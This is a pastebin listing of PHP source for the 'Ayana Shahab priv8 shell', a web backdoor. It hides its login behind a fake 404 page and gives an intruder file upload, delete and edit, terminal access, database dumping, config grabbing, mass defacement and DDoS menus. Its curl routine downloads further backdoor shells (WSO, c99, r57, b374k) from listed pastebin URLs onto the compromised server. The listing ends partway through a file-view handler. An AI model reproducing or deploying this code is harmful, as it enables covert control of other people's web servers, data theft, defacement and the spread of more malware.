· 5 years ago · May 08, 2020, 11:00 PM
1<?php
2session_start();
3error_reporting(0);
4ini_set('max_execution_time',0);
5set_time_limit(0);
6ini_set('error_log',NULL);
7date_default_timezone_set("Asia/Jakarta");
8define('judul','Ayana Shahab priv8 shell'); // Set title ;)
9define('ar','<i class=\'fa fa-arrow-right\'></i>');
10$s57_paswot = "39a54ee9b50e3484df126d83277593dc";//default password : achan , change with md5 type hash ;) .
11
12function login() {
13$a_log ="<html><head><title>".judul."</title></head>";
14$a_log.="<font color=red>achan</font>@<font color=blue>".$_SERVER['HTTP_HOST']."</font>:<font color=green>".getcwd()."</font> $ sudo su";
15$a_log.="<form method='POST'><label for='pass'>[<font color=purple>sudo</font>]<font color=orange> password for achan</font>:</label><input type='password' name='pass' style='border:0;width:600px;'></form>";
16$a_log.="</body></html>";
17if(empty($_GET['login'])=="achan"){
18 echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
19<html><head>
20<title>404 Not Found</title>
21</head><body>
22<h1>Not Found</h1>
23<p>The requested URL '.$_SERVER['REQUEST_URI'].' was not found on this server.</p>
24<hr>
25<address>'.$_SERVER['SERVER_SOFTWARE'].' Server at '.$_SERVER['HTTP_HOST'].' Port 80</address>
26</body></html>
27';
28}else{
29 echo $a_log;
30}
31 exit;
32}
33
34if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
35 if( empty( $s57_paswot ) ||
36 ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $s57_paswot) ) )
37 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
38 else
39 login();
40if(empty($_GET['i'])){
41$d=getcwd();
42}else{
43$d=$_GET['i'];
44}
45function tentang(){
46 $tentang="<center>
47 <pre class='w3-code w3-text-indigo w3-text-shadow'>";
48 $tentang.="
49 +-------------------------------------------------+
50 | ~[ Rebl0x3r Premium Priv8 Shell ]~ |
51 | c0dename : cr4ck1ng_stuff |
52 | Author : shutdown57 a.k.a alinko-kun |
53 | Written : PHP,HTML,CSS(w3.css),JS |
54 +-------------------------------------------------+";
55 $tentang.="</pre>";
56 $tentang.="<h1 class='w3-indigo w3-text-shadow w3-animate-right'>Ayana Shahab priv8 shell</h1>";
57 $tentang.="<h2 class='w3-white w3-text-shadow w3-animate-left'>linuxcode.org ~ WithOutShadow ~ PeSec Team</h2>";
58 $tentang.="<h3 class='w3-indigo w3-text-shadow w3-animate-right'>Thanks for :</h3>";
59 $tentang.="<h4 class='w3-white w3-text-shadow w3-animate-left'>God , You , sunr-15 , google.com ,pastebin.com , [-]sh4d0w_99[!] , MRG#7 , indoXploit , devilzc0de , StackOverFlow , w3schools , tutorialpoint </h4>";
60 return $tentang;
61}
62function tentangAchan(){
63 $usia=date('Y')-1997;
64 $achan="<h3 class='w3-indigo w3-text-shadow w3-text-white w3-center'>About ayana shahab</h3>";
65 $achan.="<center><img src='http://s19.postimg.org/6rkx4tpcj/achan65.jpg' border='0' style='width:200px;height:230px;cursor:zoom-in;' class='w3-center w3-circle' onclick=\"document.getElementById('achan').style.display='block';\"/></center>";
66 $achan.="<table class='w3-table w3-striped w3-border w3-center'>";
67 $achan.="<tr class='w3-blue'><td>Name :</td><td>Ayana Shahab</td></tr>";
68 $achan.="<tr class='w3-light-blue'><td>Born :</td><td>Osaka, 3 June 1997 (age $usia)</td></tr>";
69 $achan.="<tr class='w3-grey'><td>Member :</td><td>JKT48 at Team K3 </td></tr>";
70 $achan.="<tr class='w3-blue-grey'><td>Career :</td><td>2011-2016 (JKT48 Team J) ,Dec 2016 (JKT48 Team K3)</td></tr>";
71 $achan.="</table><div class='w3-modal' style='display:none;' id='achan'><a href='javascript:;' onclick=\"document.getElementById('achan').style.display='none';\" class='w3-btnclose w3-hover-indigo w3-btn-block'>× close</a><img src='http://s19.postimg.org/6rkx4tpcj/achan65.jpg' width='100%' hiegth='100%'></div>";
72 $achan.='<hr><br><center><iframe width="560" height="315" src="https://www.youtube.com/embed/3Yt0dhb6ins?controls=0&showinfo=0" frameborder="0" allowfullscreen></iframe></center>';
73 return $achan;
74}
75function tentangJKT48(){
76 $jkt="<div class='w3-container'><center><pre class='w3-code w3-text-indigo'>";
77 $jkt.="
78__ _ _ _______ _ _ ___ __
79\ \ | | |/ /_ _| || | ( _ ) / /
80 \ \_ | | ' / | | | || |_ / _ \/ /
81 / / |_| | . \ | | |__ _| (_) \ \
82/_/ \___/|_|\_\ |_| |_| \___/ \_\
83
84 Joyfull Kawaii Try to be the best
85";
86 $jkt.="</pre>";
87 $jkt.="<iframe src='https://en.wikipedia.org/wiki/JKT48' style='width:80%;height:400px;' class='w3-indigo w3-border'></iframe>";
88 $jkt.="</center></div>";
89return $jkt;
90}
91$l=array(
92 'adminer'=>"https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php",
93 'wso'=>"http://pastebin.com/raw/N0eh3Q7Y",
94 'bejak'=>"http://pastebin.com/raw/sQJVES6y",
95 'indoxploit_shell'=>'http://pastebin.com/raw/nC6pWh5a',
96 'andela'=>'http://pastebin.com/raw/0dkmjaWJ',
97 'injection'=>'http://pastebin.com/raw/znH7r6Jr',
98 'sbh'=>'http://pastebin.com/raw/SMDJVTF8',
99 'bh'=>'http://pastebin.com/raw/3L2ESWeu',
100 'c99'=>'http://pastebin.com/raw/Ms0ptnpH',
101 'r57'=>'http://pastebin.com/raw/S9tzBgg3',
102 );
103function ambilcode($url, $isi) {
104 $fp = fopen($isi, "w");
105 $ch = curl_init();
106 curl_setopt($ch, CURLOPT_URL, $url);
107 curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
108 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
109 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
110 curl_setopt($ch, CURLOPT_FILE, $fp);
111 return curl_exec($ch);
112 curl_close($ch);
113 fclose($fp);
114 ob_flush();
115 flush();
116 }
117function ukuranupil($upil){
118 $size = filesize($upil)/1024;
119$size = round($size,3);
120if($size >= 1024){
121$size = round($size/1024,2).' MB';
122}else{
123$size = $size.' KB';
124}
125return $size;
126}
127function perms($file)
128{
129 if($mode=@fileperms($file)){
130 $perms='';
131 $perms .= ($mode & 00400) ? 'r' : '-';
132 $perms .= ($mode & 00200) ? 'w' : '-';
133 $perms .= ($mode & 00100) ? 'x' : '-';
134 $perms .= ($mode & 00040) ? 'r' : '-';
135 $perms .= ($mode & 00020) ? 'w' : '-';
136 $perms .= ($mode & 00010) ? 'x' : '-';
137 $perms .= ($mode & 00004) ? 'r' : '-';
138 $perms .= ($mode & 00002) ? 'w' : '-';
139 $perms .= ($mode & 00001) ? 'x' : '-';
140 return $perms;
141 }
142 else return "??????????";
143}
144function lmodif($upil){
145 $mod=date('d M Y [H:m]',filemtime($upil));
146 return $mod;
147}
148function owngro($file){
149$name=@posix_getpwuid(@fileowner($file));
150$group=@posix_getgrgid(@filegroup($file));
151$owngro=$name['name'].":".$group['name'];
152return $owngro;
153}
154$html_a='<!DOCTYPE html>';
155$html_a.='<html><head><title>'.judul.'</title><link rel="ICON" type="text/css" href="https://pbs.twimg.com/profile_images/740108670994763776/WvsElzwN.jpg">';
156
157$html_a.='
158<meta name="author" content="shutdown57">
159<meta name="keywords" content="shutdown57,ayana shahab shell">
160<meta name="description" content="ayana shahab shell c0ded by shutdown57">
161<link rel="stylesheet" href="http://www.w3schools.com/lib/w3.css">
162<!--<link rel="stylesheet" href="w3.css">-->
163<link rel="stylesheet" href="http://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.6.3/css/font-awesome.min.css">';
164$html_a.='</head><body onload="haposurl();"><style type="text/css">
165 *{font-size:12px;font-family: courier new;}a{text-decoration: none;}
166</style>';
167$nav_a ='<ul class="w3-navbar w3-left-align w3-large w3-indigo">';
168$nav_a.='<li><a href="?index.php" class="w3-hover-white"><i class="fa fa-home"></i> Home</a></li>';
169$nav_a.='<li class="w3-dropdown-hover"><a href="#" class="w3-hover-white"><i class="fa fa-user"></i> About</a>';
170$nav_a.='<div class="w3-dropdown-content w3-white">';
171$nav_a.='<a href="?a=tentang&i='.$d.'" class="w3-hover-indigo">'.ar.' about this</a>';
172$nav_a.='<a href="?a=achan&i='.$d.'" class="w3-hover-indigo">'.ar.' about ayana shahab</a>';
173$nav_a.='<a href="?a=jkt48&i='.$d.'" class="w3-hover-indigo">'.ar.' about JKT48</a></div></li>';
174$nav_a.='<li class="w3-dropdown-hover"><a href="?a=terminal&i'.$d.'" class="w3-hover-white"><i class="fa fa-terminal"></i> Terminal</a>';
175$nav_a.='<div class="w3-dropdown-content w3-white">';
176$nav_a.='<a href="?a=shell&i='.$d.'" class="w3-hover-indigo">'.ar.' Shell <i class="fa fa-linux"></i></a>';
177$nav_a.='<a href="?a=cmd&i='.$d.'" class="w3-hover-indigo">'.ar.' CMD <i class="fa fa-windows"></i></a>';
178$nav_a.='</div></li>';
179$nav_a.='<li class=" w3-dropdown-hover"><a href="#" class="w3-hover-white "><i class="fa fa-database"></i> Database assesment</a>';
180$nav_a.='<div class="w3-dropdown-content w3-white"> ';
181$nav_a.='<a href="?a=svc&i='.$d.'" class="w3-hover-indigo">'.ar.' SQLi vuln checker</a>';
182$nav_a.='<a href="?a=adminer&i='.$d.'" class="w3-hover-indigo">'.ar.' Adminer</a>';
183$nav_a.='<a href="?a=dbdump&i='.$d.'" class="w3-hover-indigo">'.ar.' DB Dump</a>';
184$nav_a.='</div></li>';
185$nav_a.='<li class="w3-dropdown-hover"><a href="#" class="w3-hover-white "><i class="fa fa-bold"></i> String tools</a>';
186$nav_a.='<div class="w3-dropdown-content w3-white">';
187$nav_a.='<a href="?a=hi&i='.$d.'" class="w3-hover-indigo">'.ar.' Hash identify</a>';
188$nav_a.='<a href="?a=ph&i='.$d.'" class="w3-hover-indigo">'.ar.' Password Hash</a>';
189$nav_a.='<a href="?a=ed&i='.$d.'" class="w3-hover-indigo">'.ar.' Enc0de & Dec0de</a>';
190$nav_a.='<a href="?a=rs&i='.$d.'" class="w3-hover-indigo">'.ar.' Replace String</a>';
191$nav_a.='</div></li>';
192$nav_a.='<li class="w3-dropdown-hover"><a href="#" class="w3-hover-white "><i class="fa fa-universal-access"></i> Backdoor</a>';
193$nav_a.='<div class="w3-dropdown-content w3-white">';
194$nav_a.='<a href="?a=wso&i='.$d.'" class="w3-hover-indigo">'.ar.' WSO</a>';
195$nav_a.='<a href="?a=injection&i='.$d.'" class="w3-hover-indigo">'.ar.' 1n73ction</a>';
196$nav_a.='<a href="?a=bejak&i='.$d.'" class="w3-hover-indigo">'.ar.' b374k</a>';
197$nav_a.='<a href="?a=andela&i='.$d.'" class="w3-hover-indigo">'.ar.' andela</a>';
198$nav_a.='<a href="?a=idx&i='.$d.'" class="w3-hover-indigo">'.ar.' indoxploit</a>';
199$nav_a.='<a href="?a=bh&i='.$d.'" class="w3-hover-indigo">'.ar.' Blackhat</a>';
200$nav_a.='<a href="?a=sbh&i='.$d.'" class="w3-hover-indigo">'.ar.' Surabaya Blackhat</a>';
201$nav_a.='<a href="?a=c&i='.$d.'" class="w3-hover-indigo">'.ar.' c99</a>';
202$nav_a.='<a href="?a=r&i='.$d.'" class="w3-hover-indigo">'.ar.' r57</a>';
203$nav_a.='</div></li>';
204$nav_a.='<li class="w3-dropdown-hover"><a href="#" class="w3-hover-white "><i class="fa fa-firefox"></i> Web analisist</a>';
205$nav_a.='<div class="w3-dropdown-content w3-white">';
206$nav_a.='<a href="?a=cg&i='.$d.'" class="w3-hover-indigo">'.ar.' Config grabber</a>';
207$nav_a.='<a href="?a=af&i='.$d.'" class="w3-hover-indigo">'.ar.' admin finder</a>';
208$nav_a.='<a href="?a=md&i='.$d.'" class="w3-hover-indigo">'.ar.' Mass deface</a>';
209$nav_a.='<a href="?a=wprp&i='.$d.'" class="w3-hover-indigo">'.ar.' WPRessPass</a>';
210$nav_a.='<a href="?a=jrp&i='.$d.'" class="w3-hover-indigo">'.ar.' JoomRessPass</a>';
211$nav_a.='<a href="?a=net&i='.$d.'" class="w3-hover-indigo">'.ar.' NetSploit</a>';
212$nav_a.='<a href="?a=ddos&i='.$d.'" class="w3-hover-indigo">'.ar.' DDoS</a>';
213$nav_a.='<a href="?a=em&i='.$d.'" class="w3-hover-indigo">'.ar.' eMail</a>';
214$nav_a.='<a href="?a=zh&i='.$d.'" class="w3-hover-indigo">'.ar.' ZONE-H</a>';
215$nav_a.='<a href="?a=sym&i='.$d.'" class="w3-hover-indigo">'.ar.' Symlink</a>';
216$nav_a.='<a href="?a=rdp&i='.$d.'" class="w3-hover-indigo">'.ar.' RDP tools</a>';
217$nav_a.='<a href="?a=fr&o='.$d.'" class="w3-hover-indigo">'.ar.' Fake root</a>';
218$nav_a.='</div></li>';
219$nav_a.='<li class="w3-dropdown-hover"><a href="#" class="w3-hover-white"><i class="fa fa-file-o"></i> SC Deface</a>';
220$nav_a.='<div class="w3-dropdown-content w3-white">';
221$nav_a.='<a href="?a=wos&i='.$d.'" class="w3-hover-indigo">'.ar.' WithOutShadow</a>';
222$nav_a.='<a href="?a=ps&i='.$d.'" class="w3-hover-indigo">'.ar.' PeSeC Team</a>';
223$nav_a.='</div></li>';
224 if(isset($_GET['s'])){
225 $nav_a.="<li class='w3-dropdown-hover'>";
226 $nav_a.="<a href='#' class='w3-hover-white '>? Action</a>";
227 $nav_a.="<div class='w3-dropdown-content'>";
228 $nav_a.="<a href='?a=rename&i=$d&s=".$_GET['s']."'>".ar." Rename</a>";
229 $nav_a.="<a href='?a=edit&i=$d&s=".$_GET['s']."'>".ar." Edit</a>";
230 $nav_a.="<a href='?a=unlink&i=$d&s=".$_GET['s']."'>".ar." Delete</a>";
231 $nav_a.="<a href='?a=chmod&i=$d&s=".$_GET['s']."'>".ar." Chmod</a>";
232 $nav_a.="<a href='?a=download&i=$d&s=".$_GET['s']."'>".ar." Download</a>";
233 $nav_a.="</div></li> ";
234 }
235 $nav_a.='<li title="Ayana Shahab Member JKT48 at Team K3" class="w3-dropdown-hover"><b><a class="w3-text-shadow w3-center w3-hover-pale-indigo" href="#"><i class="fa fa-paw"></i> Ayana Shahab Priv8 Shell <i class="fa fa-paw"></i></a></b>';
236 $nav_a.='<div class="w3-dropdown-content w3-white">';
237$nav_a.='<a href="?a=themes&i='.$d.'" class="w3-hover-indigo">'.ar.' Change Themes</a>';
238$nav_a.='<a href="?a=pass&i='.$d.'" class="w3-hover-indigo">'.ar.' Change Password</a></div></li>';
239 $nav_a.='<li class="w3-hover-white w3-right"><a href="?a=logout" class="w3-hover-white"><i class="fa fa-sign-out"></i>Logout</a></li></ul>';//end
240 echo $html_a;
241 echo $nav_a;
242
243 $disabled=(is_writable($d)) ? : "disabled";
244 if(isset($_POST['upfile'])){
245 $files = array(
246 '1' => $_FILES['files']['name'],
247 '2' => $_FILES['files2']['name'],
248 '3' => $_FILES['files3']['name'],
249 '4' => $_FILES['files4']['name'],
250 '5' => $_FILES['files5']['name']
251 );
252 $tmp= array(
253 '1' => $_FILES['files']['tmp_name'],
254 '2' => $_FILES['files2']['tmp_name'],
255 '3' => $_FILES['files3']['tmp_name'],
256 '4' => $_FILES['files4']['tmp_name'],
257 '5' => $_FILES['files5']['tmp_name']
258 );
259 $dir=array(
260 '1' => $_POST['dir']."/",
261 '2' => $_POST['dir2']."/",
262 '3' => $_POST['dir3']."/",
263 '4' => $_POST['dir4']."/",
264 '5' => $_POST['dir5']."/"
265 );
266 move_uploaded_file($tmp['1'],$dir['1'].$files['1']);
267 move_uploaded_file($tmp['2'],$dir['2'].$files['2']);
268 move_uploaded_file($tmp['3'],$dir['3'].$files['3']);
269 move_uploaded_file($tmp['4'],$dir['4'].$files['4']);
270 move_uploaded_file($tmp['5'],$dir['5'].$files['5']);
271 echo "<script>
272 alert('Upload done!');
273 </script>";
274}
275if(is_writable($d)){
276 $stat='<font color="indigo">Writable [OK]</font>';
277}else{
278 $stat='<font color="grey">Not Writable [Read-Only]</font>';
279}
280
281 echo'<script type="text/javascript">
282 function ijolno(anjing,kucing){
283 document.getElementById(anjing).style.display="none";
284 document.getElementById(kucing).style.display="block";
285 }
286 function upload(){
287 document.getElementById("upload5").style.display="block";
288 }
289</script>';
290
291echo'<div class="w3-modal " id="upload5" style="display:none;"><a href="javascript:;" onclick="document.getElementById(\'upload5\').style.display=\'none\';" class="w3-closebtn w3-hover-indigo" style="top:0;right:0;position:fixed;">×</a>';
292echo'<div class="w3-container w3-modal-content w3-indigo w3-card-8 w3-center"><h3 class="w3-white w3-text-shadow">Uploader Files</h3>';
293echo'<p> status upload file : '.$stat.'</p><table class="w3-table w3-border"><tr><td>file</td><td>Target Dir</td></tr><tr><td>';
294echo'<form method="Post" enctype="multipart/form-data">';
295$form_a='<input type="file" name="files" '.$disabled.'></td><td>';
296$form_a.='<input type="text" name="dir" value="'.$d.'" class="w3-input"></td></tr><tr><td>';
297$form_a.='<input type="file" name="files2" '.$disabled.'></td><td>';
298$form_a.='<input type="text" name="dir2" value="'.$d.'" class="w3-input" ></td></tr><tr><td>';
299$form_a.='<input type="file" name="files3" '.$disabled.'></td><td>';
300$form_a.='<input type="text" name="dir3" value="'.$d.'" class="w3-input"></td></tr><tr><td>';
301$form_a.='<input type="file" name="files4" '.$disabled.'></td><td>';
302$form_a.='<input type="text" name="dir4" value="'.$d.'" class="w3-input"></td></tr><tr><td>';
303$form_a.='<input type="file" name="files5" '.$disabled.'></td><td>';
304$form_a.='<input type="text" name="dir5" value="'.$d.'" class="w3-input"></td></tr></table><br>';
305$form_a.='<input type="submit" name="upfile" class="w3-btn w3-btn-block w3-white" value="upload all"></form></div></div>';
306echo $form_a;
307if(!function_exists('posix_getegid')) {
308 $user = @get_current_user();
309 $uid = @getmyuid();
310 $gid = @getmygid();
311 $group = "?";
312} else {
313 $uid = @posix_getpwuid(posix_geteuid());
314 $gid = @posix_getgrgid(posix_getegid());
315 $user = $uid['name'];
316 $uid = $uid['uid'];
317 $group = $gid['name'];
318 $gid = $gid['gid'];
319}
320
321function convertByte($s) {
322if($s >= 1073741824)
323return sprintf('%1.2f',$s / 1073741824 ).' GB';
324elseif($s >= 1048576)
325return sprintf('%1.2f',$s / 1048576 ) .' MB';
326elseif($s >= 1024)
327return sprintf('%1.2f',$s / 1024 ) .' KB';
328else
329return $s .' B';
330}
331$os=(preg_match('/linux|Linux/',php_uname())) ? "<i class='fa fa-linux' title='linux'></i>" : "<i class='fa fa-windows' title='windows'></i>";
332$sm= ini_get('safe_mode') ? "<font color=indigo> ON<?font>" : "<font color=grey> OFF</font>";
333$mysql= function_exists('mysql_connect')?"<font color=indigo> ON</font>":"<font color=grey> OFF</font>";
334$url_fp =ini_get('url_fopen')?"<font color=indigo> ON</font>":"<font color=grey> OFF</font>";
335$curl=function_exists('curl_init')?"<font color=indigo> ON</font>":"<font color=grey> OFF</font>";
336$df=ini_get('disable_functions') ? substr(ini_get('disable_functions'),0,50).",etc..." : "<font color=grey> NONE</font>";
337
338echo "<hr>
339<div class='w3-container w3-indigo'>
340<div class='w3-row'>
341<div class='w3-col m6 l6 s12 w3-animate-right'>
342HOSTNAME : ".$_SERVER['HTTP_HOST']."<br>
343Free Disk : ".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."<br>
344IP SERVER : ".gethostbyname($_SERVER['HTTP_HOST'])." | YOUR IP : ".$_SERVER['REMOTE_ADDR']." <br>
345SERVER SOFTWARE : ".$_SERVER['SERVER_SOFTWARE']."<br>
346User: <font color=indigo>".$user."</font> (".$uid.") Group: <font color=indigo>".$group."</font> (".$gid.")<br>
347PHP version : ".phpversion()."-[<a href='?a=phpinfo&i=$d'>PHPINFO</a>]
348CURL:".$curl."|safemode:".$sm."|URL FOPEN:".$url_fp."|MySQL:".$mysql."<br>
349UNAME : ".php_uname()."<br>
350DISABLE FUNCTIONS :".$df."<br>
351</div>
352<div class='w3-col m6 l6 s12 w3-animate-left'>
353<form method='post' enctype='multipart/form-data'>
354<table class='w3-table'><tr><td>File :</td><td>
355<input type='file' name='upfile' class='w3-input w3-animate-input' style='width:200px;' ".$disabled."></td><td><button type='submit' name='subup' class='w3-btn w3-white w3-text-shadow'><i class='fa fa-upload'></i> upload</button></td></tr></table></form>";
356if(isset($_POST['subup'])){
357 if(move_uploaded_file($_FILES['upfile']['tmp_name'],$d."/".$_FILES['upfile']['name'])){
358 echo "<script>
359 alert('upload done!');
360 </script>";
361 }else{
362 echo "<script>
363 alert('upload failed');
364 </script>";
365 }
366 }
367
368echo"
369<table class='w3-table'><tr><td><a href=\"javascript:ijolno('sengelek','sengapek');\"><i class='fa fa-hand-o-right' style='font-size:24px;'></i></a></td><td>
370<div id='sengapek' style='display:none;'>
371<form method='get'>
372 <input type='text' value='".$d."' name='i' class='w3-input w3-animate-input w3-indigo' style='width:200px'>
373 </form>
374 </div>
375<div id='sengelek'>
376 ";
377
378$d=str_replace('\\','/',$d);
379$path = explode('/',$d);
380
381foreach($path as $id=>$curdir){
382if($curdir == '' && $id == 0){
383$a = true;
384echo '<a href="?i=/">/</a>';
385continue;
386}
387if($curdir == '') continue;
388echo '<a href="?i=';
389for($i=0;$i<=$id;$i++){
390echo "$path[$i]";
391if($i != $id) echo "/";
392}
393echo '">'.$curdir.'</a>/';
394}
395$pwd=str_replace('\\','/',getcwd());
396(is_writable($d))?$stat=" ~ <font color=indigo>WRITABLE</font>" :$stat="<font color=grey>NOT WRITABLE</font>";
397echo $stat."</div></td></tr><tr class='w3-center'><td colspan='2'><a href='?index.php' class='w3-margin-left' title='home page.'><i class='fa fa-home' style='font-size:20px;'></i></a> <a href='javascript:history.go(-1);' class='w3-margin-left' title='go back one page,'><i class='fa fa-arrow-left' style='font-size:20px;'></i></a> <a href='javascript:history.go(+1);' class='w3-margin-left' title='go forward one page.'><i class='fa fa-arrow-right' style='font-size:20px;'></i></a> <a href='".$_SERVER['REQUEST_URI']."' class='w3-margin-left' title='refresh page'><i class='fa fa-refresh' style='font-size:20px;'></i></a> <a href='javascript:;' class='w3-margin-left' onclick='upload();' title='Show uploader'><i class='fa fa-upload' style='font-size:20px;'></i></a></td></tr></table></div></div></div><hr>";
398if(empty($_GET['a'])){
399 echo'<form method="POST"><table class="w3-table w3-responsive w3-striped">';
400 echo'<thead class="w3-indigo w3-hover-indigo"><th style="width:20px;">No.</th><th style="width:20px;">^</th><th style="width:250px;max-width:300px;">Name</th><th style="width:100px;">Size</th><th style="width:130px;max-width:180px;">Type</th><th style="width:160px;max-width:190px;">Group:Owner</th><th style="width:120px;">Permission</th><th style="width:150px;max-width:180px;">Last Modified</th><th style="width:120px;">Action</th></thead>';
401 echo "<tr class='w3-hover-indigo'><td>0</td><td></td><td><a href='?i=".dirname("$d")."'><i class='fa fa-arrow-left'></i></a></td><td>--</td><td>achan/link</td><td>achan:ayana</td><td>~</td><td>~</td><td>
402 <div class='w3-dropdown-hover'>
403 <a href='#' class='w3-btn w3-indigo' style='border-radius:100%;-webkit-border-radius:100%;-o-border-radius:100%;-moz-border-radius:100%;'>?</a>
404 <div class='w3-dropdown-content w3-border'>
405 <a href='?a=mkdir&i=$d'>make directory</a>
406 <a href='?a=mkfile&i=$d'>make file</a>
407 </div>
408</div>
409 </td>";
410 $s=scandir($d);
411 $no=1;
412 $total_file=0;
413 $total_dir=0;
414 foreach ($s as $d2) {
415 if(!is_dir("$d/$d2")||$d2=='.'||$d2=='..')continue;
416 if(mime_content_type("$d/$d2")){
417 $mime=mime_content_type("$d/$d2");
418 }else{
419 $mime="unknow/denied";
420 }
421 echo "<tr class='w3-hover-indigo'><td>".$no++."</td><td><input type='checkbox' class='w3-check' name='cekd[]' value='".$d."/".$d2."' ></td><td><i class='fa fa-folder'></i> <a href='?i=$d/$d2' title='dir : $d2'>$d2</a></td><td>".ukuranupil("$d/$d2")."</td><td>".$mime."</td><td>".owngro("$d/$d2")."</td><td>".perms("$d/$d2")."</td><td>".lmodif("$d/$d2")."</td><td>
422 <div class='w3-dropdown-hover'>
423 <a href='#' class='w3-btn w3-indigo' style='border-radius:100%;-webkit-border-radius:100%;-o-border-radius:100%;-moz-border-radius:100%;'>?</a>
424 <div class='w3-dropdown-content w3-border'>
425 <a href='?a=rename&i=$d&s=$d2'>Rename</a>
426 <a href='?a=rmdir&i=$d&s=$d2'>Delete</a>
427 <a href='?a=chmod&i=$d&s=$d2'>Chmod</a>
428 </div>
429</div>
430 </td></tr>";
431 $total_dir++;
432 }
433 foreach ($s as $f) {
434 if(!is_file("$d/$f")||$f=='.'||$f=='..')continue;
435 if(mime_content_type("$d/$f")){
436 $mime= mime_content_type("$d/$f");
437 }else{
438 $mime="unknow/denied";
439 }
440 echo "<tr class='w3-hover-indigo'><td>".$no++."</td><td><input type='checkbox' class='w3-check' name='cekf[]' value='".$d."/".$f."' ></td><td><i class='fa fa-file'></i> <a href='?i=$d&a=view&s=$f' title='file : $f'>$f</a></td><td>".ukuranupil("$d/$f")."</td><td>".$mime."</td><td>".owngro("$d/$f")."</td><td>".perms("$d/$f")."</td><td>".lmodif("$d/$f")."</td><td>
441 <div class='w3-dropdown-hover'>
442 <a href='#' class='w3-btn w3-indigo' style='border-radius:100%;-webkit-border-radius:100%;-o-border-radius:100%;-moz-border-radius:100%;'>?</a>
443 <div class='w3-dropdown-content w3-border'>
444 <a href='?a=rename&i=$d&s=$f'>Rename</a>
445 <a href='?a=edit&i=$d&s=$f'>Edit</a>
446 <a href='?a=unlink&i=$d&s=$f'>Delete</a>
447 <a href='?a=chmod&i=$d&s=$f'>Chmod</a>
448 <a href='?a=download&i=$d&s=$f'>Download</a>
449 </div>
450</div> </td></tr>";
451$total_file++;
452 }
453 echo '
454<tr class="w3-indigo w3-text-shadow"><td colspan="9">
455<select name="select" onchange="this.form.submit()" style="width:100%" class="w3-input w3-indigo w3-hover-white">
456<option> action selected files | total : '.$total_file.' files & '.$total_dir.' directories | where : '.$d.'</option>
457<option value="del">delete</option>
458<option value="backup">backUp</option>
459<option value="unzip">unzip</option>
460<option value="gz">compress .gz</option>
461<option value="tar"> compress .tar.gz </option>
462</select></td></tr>
463</table></form>';
464
465if(isset($_POST['select'])){
466 $file=$_POST['cekf'];
467 $dir=$_POST['cekd'];
468 if($_POST['select']=='del'){
469 if($_POST['cekf']){
470
471 foreach ($file as $cekf) {
472 if(unlink($cekf)){
473 echo"<meta http-equiv='refresh' content=0;url=>";
474 }
475 }
476 }
477 if($_POST['cekd']){
478
479 foreach ($dir as $cekd) {
480 if(rmdir($cekd)){
481 echo"<meta http-equiv='refresh' content=0;url=>";
482 }
483 }}}elseif($_POST['select']=='backup'){
484if($_POST['cekf']){
485
486 foreach ($file as $copy) {
487 $copi=basename($copy);
488 if(!file_exists("backup")){
489 @mkdir('backup');
490 }
491 if(copy($copy,"backup/".basename($copy))){
492 echo"<meta http-equiv='refresh' content=0;url=?i=".getcwd()."/backup>";
493 }else{
494 echo "[<font color=grey>FAIL</font>]--> ".basename($Copy)."<br>";
495 }
496 }
497}
498}elseif ($_POST['select']=='unzip') {
499 @mkdir("extract");
500 foreach ($file as $unzip) {
501 $zip = new ZipArchive;
502$res = $zip->open($unzip);
503
504if ($res === TRUE) {
505
506$zip->extractTo("extract");
507
508$zip->close();
509 echo"<meta http-equiv='refresh' content=0;url=?i=".getcwd()."/extract>";
510 } else {
511
512echo "[<font color=grey>FAIL</font>] feiled!";
513 }
514 }
515}elseif($_POST['select']=='gz'){
516 if($_POST['cekf']){
517 if(!file_exists("compress")){
518 @mkdir("compress");
519 }
520foreach($file as $gz){
521$gzfile = "compress/".basename($gz).".gz";
522$fp = gzopen($gzfile, 'w9');
523if(gzwrite($fp, file_get_contents($gz))){
524 echo"<meta http-equiv='refresh' content=0;url=?i=".getcwd()."/compress>";
525}
526gzclose($fp);
527
528}
529}
530}elseif ($_POST['select']=='tar') {
531 try
532{
533 $a = new PharData('achan48.tar');
534foreach($file as $tar){
535 $a->addFile($tar);
536}
537 $a->compress(Phar::GZ);
538 @unlink('achan48.tar');
539}
540catch (Exception $e)
541{
542 echo "Exception : " . $e;
543}
544}
545}
546
547
548
549}else{
550 function refpage($url){
551 echo'<meta http-equiv="refresh" content="0;URL='.$url.'">';
552}
553
554if($_GET['a']=='rename'){
555
556 echo "<div class='w3-container w3-center'>
557<h3 class='w3-indigo w3-text-white w3-text-shadow'>New name</h3>
558<table><tr><td>
559<form method='post'>newname :</td><td><input type='text' name='newname' value='".$_GET[s]."' class='w3-input w3-animate-input' style='width:200px'></td><td><input type='submit' value='>>' class='w3-btn w3-indigo'></td></tr></table></form>
560 </div>";
561 if(isset($_POST['newname'])){
562 if(rename($_GET['i']."/".$_GET['s'],$_GET['i']."/".$_POST['newname'])){
563 refpage('?i='.$_GET['i']);
564 }else{
565 refpage('?i='.$_GET['i']);
566 }
567 }
568}elseif ($_GET['a']=='rmdir') {
569 function rmdir_unlink_rmdir($d){
570 if(!rmdir($d)){
571 $s=scandir($d);
572 foreach ($s as $ss) {
573 if(is_file($d."/".$ss)){
574 if(unlink($d."/".$ss)){
575 rmdir($d);
576
577 }
578 }
579 if(is_dir($d."/".$ss)){
580 rmdir($d."/".$ss);
581 rmdir($d);
582
583 }
584 }
585 }
586 }
587 if(rmdir_unlink_rmdir($_GET['i']."/".$_GET['s'])){
588 refpaage('?i='.$_GET['i']);
589 }else{
590 refpage('?i='.$_GET['i']);
591 }
592}elseif ($_GET['a']=='unlink') {
593if(unlink($_GET['i']."/".$_GET['s'])){
594 refpage('?i='.$_GET['i']);
595}else{
596 refpage('?i='.$_GET['i']);
597}
598}elseif ($_GET['a']=='view') {
599 echo'
600 <div class="w3-center w3-container">
601 <h3 class="w3-indigo w3-text-white w3-text-shadow">View file</h3>
